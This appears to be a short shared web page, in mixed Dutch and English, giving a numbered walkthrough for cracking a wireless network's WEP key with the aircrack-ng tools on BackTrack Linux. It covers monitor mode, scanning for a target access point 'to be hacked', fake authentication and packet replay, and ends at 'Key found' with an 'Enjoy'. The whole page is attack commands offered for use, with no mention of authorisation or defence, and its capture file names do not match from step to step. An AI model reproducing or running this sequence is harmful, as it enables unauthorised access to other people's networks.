You are on page 1of 1

Cracking WEP-keys with Linux Backtrack

“Open bij iedere command een nieuw console-venster.”

“Log in als root@bt:”

“Typ onderstaande commands in in de terminal:”

1. Airmon-ng
(check your interface, wlan0, wlan1, mon0, phy0…)

2. Airmon-ng start interface


(monitoring mode must be enabled)

3. Airodump-ng -w wepcap interface


(scant naar AP’s, schrijf de bssid, essid en channel op van de
te hacken client)

4. Airodump-ng -w 1 -c channel --bssid bssid interface

5. Aireplay-ng -1 0 -a bssid interface


(Sending authentication request)

6. Aireplay-ng -3 -b bssid interface


(reading packets)

7. Aircrack-ng -a 1 wepcap-01.cap
(deze file staat ook op je bureaublad normaal gezien)

8. Key found      

Enjoy Linux Backtrack

Written by DestructionGerby aka Mr. Stitch

You might also like